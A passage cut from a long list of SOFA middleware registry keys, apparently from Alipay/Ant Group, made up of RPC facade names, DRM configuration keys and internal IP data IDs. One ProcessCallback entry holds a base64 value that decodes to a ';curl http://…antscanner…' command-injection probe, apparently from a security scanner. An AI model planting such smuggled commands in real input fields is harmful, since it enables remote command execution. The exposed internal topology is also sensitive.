FA","DATA_ID_10.15.233.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openinsight.common.service.facade.tinyappdata.api.TinyAppIndicatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.service.facade.api.DivideQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.instservice.common.service.facade.instserviceconfig.IscInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.healthCheckTimeoutExecutorFixedPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.share_finfoprod_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.28.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.sendCodeVoucherParseFailMessage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinstockprod.biz.service.gw.trade.api.TradeCustodyManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lowercaseFirst:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.mpoint.facade.MpointExpireQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.172.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.common.service.facade.appointment.AppointmentConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eventengine.common.service.facade.api.RiskEventEngineService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_COMPCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:IjtjdXJsIGh0dHA6Ly8zMzAyNDg2OS0tMTA0MDAzMDI3LmFudHNjYW5uZXIuZ2xvYmFsLmFsaXBheS5jb207Ig==@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.security.MobileContextFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.52.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditprod.service.PcreditFacilityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:lifemngReconLiquidationConfCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.smallgoal.mng.SmallGoalManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:kbsalesVisitRecordAdDownload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_PCREDITTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundmng.biz.shared.instwithdraw.service.ProductAccountUpdateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.sampleRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.promokernel.common.service.facade.api.GrayStrategyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchpunish.facade.riskaccumulate.RiskAccumulateTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.version.api.MiniAppVersionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.sasCreateContractSendTransactionMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:alipaypointmc_purchaseAudit_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.PrivilegeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.ardd.common.support.api.ScriptDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.luckyfish.query.LuckyFishRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iregulation.common.service.facade.api.autotest.AutoTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.physicaltransactionfund.acquiring.AcquiringPhysicalTransactionFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.comment.CommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.dt.RopOnePageOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.afwrobottwa:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.manager.bankcreditline.BankCreditLineManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.cbu.panama.candy.client.service.AlipayC2MLandingService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-merchantsettle-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_smartcall_groovyExecutorFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@aliminiabilityprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fundprod.common.service.facade.product.query.FundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mquery.common.service.facade.middleoffice.SaleMOProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.MixCandlestickFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpunish.common.service.facade.materials.api.MaterialUploadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.prototype2.ActivityInfoQueryFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.ssrfPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.login.LoginConfigServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofaboot-study01@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cif.facade.CreditToolService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_IRECON#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finstore.common.service.facade.fop.mng.CampaignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.OfflineExperimentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_HUIYU_NOTIFYTEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-tradefront-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchasset.common.service.facade.requirement.AssetRequirementProofingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.mng.security.ContentSecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.emotion.rpc.api.EmotionPackageRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.PortfolioSpQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.MrchisArTableConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.154.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.service.facade.SyncShortCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:bcsceneconnect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.fc.comparacenter.common.service.facade.manage.api.template.ComParaMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.securitydataservice:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.qconsole.facade.openapi.conf.topic.MsgbrokerTopicOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.220.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcshield.common.service.facade.testaccount.AgdsccTestAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.stresstest.StresstestPerformanceRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.alarmanalysis.service.MobileappcommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.SecurityddataIndicatorQuerySwitchImpl.useNewInterfaceForRiskmng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rtask.common.service.facade.RigelAccessPointQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acpartner.common.service.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.stepcounter.SportsStepSyncService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.AuthorizationBizEventFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.facade.order.QueryPurchaseOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:appfuse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","OLD_CLIENTSERVICE_TEST_5#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbcheck.biz.service.impl.test.SoapUITest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.instrument:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lightmds.common.service.facade.finder.mds.FinderMdsQueryByTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapires.facade.monitor.AlertSubscribeManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.client.api.KmiClientApi:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.antg.facade.accesstoken.AgATKAliasManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcdp.common.service.facade.advertisement.reload.SyncReloadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.ifcidentitycloud.biz.mic.msglistener.processor.IcifMsgService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.87.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hainaprod.common.service.facade.api.market.resource.MarketResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.multimediabase.facade.core.ALiveQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bcm.common.service.facade.PosWriteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceItemMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.openapi.DisasterRecoveryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finriskeventseek.facade.SlowSqlDiagAppLevelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfarm.common.service.facade.AccessServiceCommonFacade:1.0:mfinpromo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.biz.asset.service.PeriodAssetTransTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CustomerTagService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:createCycleInstanceTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.common.service.facade.support.McardTemplateSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:antsecurity_ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.partner.PartnerRoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditkit.facade.service.merchant.FavorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.trade.RepaymentPlanSalesQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.ZcbTradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.atomic.service.facade.common.CommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:alipassprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_ICIF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbindustryomp.common.service.facade.api.plan.OperationPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmportal.service.dashboard.DashboardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.ClearingCenterCodeVersionDrm.frdecisionCheckVersionValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.rec.api.RecCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.68.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointcore.common.service.facade.BudgetConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antopo.common.service.facade.biz.archspec.ErrorSceneSpecQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1212_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.xviewconf:name=com.alipay.xview.conf.drm.XViewConfClientDrm.metadataClientRefreshCycle,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.predictproxy.ModelPredictService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IGrayForwardZoneRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alipaymember.common.service.facade.config.service.BugattiConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-contentfactory-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.malgo.common.facade.OraConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.config.UserConfigInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.WithdrawBankQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.236.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.processmng:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.amspm.core.plugin.config.drm.BizIdentityConfigDrmResource.bizIdentityConfigInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradefront.service.query.api.TradeFrontQueryRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.snapshot.PublishSnapshotMigrateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditschedule@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.bxs.BXSAssessQueryFacade:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unitestcenter.common.service.facade.spi.TdatTaskDetailFacade:1.0:TOWER@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:iopenqc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.team.TeamDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.ranking.parameter.StarWishDRMResource.pageSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdaxconnectplatform.common.service.yunfengdie.product.ProductAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.EbppOrderItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizAttrMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileufs.common.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_ENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_RASSISTCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.filex.admin.FileExchangeEndpointManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.145.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilelbs.common.service.facade.PlaceAroundService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.172.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:minicore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.adapter.crypt.CaCryptUtil:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.pop.PopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:malgo_oraApprovalProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:receivableNotify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.rest.facade.operation.JobFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileacauth.service.terminal.facade.TerminalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_malgo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_TRANSFER_BILL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradecenter.biz.trade.service.FintradePaidService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.biscenter.common.service.facade.agreement.SettleRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antscheduler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sffgroup-freestyle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.order.FaOrderAssetTransConfirmFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.132.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.228.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.194.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.FundOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.infosec:name=com.alipay.infosec.client.drm.ClientDrmResourceManager.clientStrategyUpdate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebcore.common.facade.subcard.SubCardTransferOutService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityHbaseConfigResource.hbaseReadOpen,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditbillcenter.facade.service.WriteInBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:bkloanfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.CampSloganService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sccounter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.scardcenter.common.dal.ldc.offlinepay.daointerface.StationSubscribeDAO:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:openexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:bstsolprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.facade.api.acctrans.AcctransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zplayback.playback.service.CaseLibServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloancommon.common.service.facade.arrealm.zmauth.api.ZmAuthSignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_Y_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ams-assistant:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antscheduler.facade.ITopologyVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.distinguishprod.common.service.facade.pet.PetMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linglongsdk.server.facade.ComponentInvoker:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rceducenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelspop.service.solution.event.facade.EventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.checker.facade.api.CampEventCacheModelQueryCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paydecision.service.api.ScientificGuidanceService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custinsight.common.service.facade.compass.AbConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.outservice.rpc.api.ChatMessageRpcService:1.0@